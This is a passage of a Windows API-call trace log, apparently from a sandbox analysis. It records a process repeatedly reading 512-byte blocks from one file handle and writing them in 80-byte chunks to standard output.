lpOverlapped=0x0) returned 1 [0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.659] GetFileType (hFile=0x50) returned 0x1 [0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.659] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.659] GetFileType (hFile=0x50) returned 0x1 [0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.659] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.660] GetFileType (hFile=0x50) returned 0x1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.660] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.660] GetFileType (hFile=0x50) returned 0x1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.660] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.660] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.660] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.660] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.660] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.660] GetFileType (hFile=0x50) returned 0x1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.660] GetFileType (hFile=0x50) returned 0x1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.660] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.660] GetFileType (hFile=0x50) returned 0x1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.660] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.660] GetFileType (hFile=0x50) returned 0x1 [0133.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.661] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.661] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.661] GetFileType (hFile=0x50) returned 0x1 [0133.661] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.661] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.661] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.661] GetFileType (hFile=0x50) returned 0x1 [0133.661] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.661] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.661] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.661] GetFileType (hFile=0x50) returned 0x1 [0133.661] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.661] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.661] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.661] GetFileType (hFile=0x50) returned 0x1 [0133.661] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.661] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.661] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.661] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.661] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.661] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.661] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.661] GetFileType (hFile=0x50) returned 0x1 [0133.661] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.662] GetFileType (hFile=0x50) returned 0x1 [0133.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.662] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.662] GetFileType (hFile=0x50) returned 0x1 [0133.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.662] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.662] GetFileType (hFile=0x50) returned 0x1 [0133.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.662] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.662] GetFileType (hFile=0x50) returned 0x1 [0133.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.662] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.662] GetFileType (hFile=0x50) returned 0x1 [0133.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.662] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.663] GetFileType (hFile=0x50) returned 0x1 [0133.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.663] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.663] GetFileType (hFile=0x50) returned 0x1 [0133.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.663] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.663] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.663] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.663] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.663] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.663] GetFileType (hFile=0x50) returned 0x1 [0133.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.663] GetFileType (hFile=0x50) returned 0x1 [0133.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.663] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.663] GetFileType (hFile=0x50) returned 0x1 [0133.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.663] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.663] GetFileType (hFile=0x50) returned 0x1 [0133.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.664] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.664] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.664] GetFileType (hFile=0x50) returned 0x1 [0133.664] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.664] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.664] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.664] GetFileType (hFile=0x50) returned 0x1 [0133.664] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.664] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.664] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.664] GetFileType (hFile=0x50) returned 0x1 [0133.664] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.664] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.664] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.664] GetFileType (hFile=0x50) returned 0x1 [0133.664] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.664] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.664] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.664] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.664] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.664] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] GetFileType (hFile=0x50) returned 0x1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] GetFileType (hFile=0x50) returned 0x1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] GetFileType (hFile=0x50) returned 0x1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] GetFileType (hFile=0x50) returned 0x1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] GetFileType (hFile=0x50) returned 0x1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] GetFileType (hFile=0x50) returned 0x1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.665] GetFileType (hFile=0x50) returned 0x1 [0133.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.666] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.666] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.666] GetFileType (hFile=0x50) returned 0x1 [0133.666] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.666] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.666] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.666] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.666] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.666] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.666] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.666] GetFileType (hFile=0x50) returned 0x1 [0133.666] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.666] GetFileType (hFile=0x50) returned 0x1 [0133.666] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.666] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.666] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.666] GetFileType (hFile=0x50) returned 0x1 [0133.666] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.666] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.666] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.666] GetFileType (hFile=0x50) returned 0x1 [0133.666] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.666] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.667] GetFileType (hFile=0x50) returned 0x1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.667] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.667] GetFileType (hFile=0x50) returned 0x1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.667] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.667] GetFileType (hFile=0x50) returned 0x1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.667] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.667] GetFileType (hFile=0x50) returned 0x1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.667] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.667] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.667] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.667] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.667] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.667] GetFileType (hFile=0x50) returned 0x1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.667] GetFileType (hFile=0x50) returned 0x1 [0133.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] GetFileType (hFile=0x50) returned 0x1 [0133.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] GetFileType (hFile=0x50) returned 0x1 [0133.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] GetFileType (hFile=0x50) returned 0x1 [0133.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] GetFileType (hFile=0x50) returned 0x1 [0133.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] GetFileType (hFile=0x50) returned 0x1 [0133.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.668] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.669] GetFileType (hFile=0x50) returned 0x1 [0133.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.669] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.669] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.669] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.669] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.669] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.669] GetFileType (hFile=0x50) returned 0x1 [0133.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.669] GetFileType (hFile=0x50) returned 0x1 [0133.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.669] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.669] GetFileType (hFile=0x50) returned 0x1 [0133.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.669] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.669] GetFileType (hFile=0x50) returned 0x1 [0133.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.669] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.669] GetFileType (hFile=0x50) returned 0x1 [0133.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.670] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.670] GetFileType (hFile=0x50) returned 0x1 [0133.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.679] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.679] _get_osfhandle 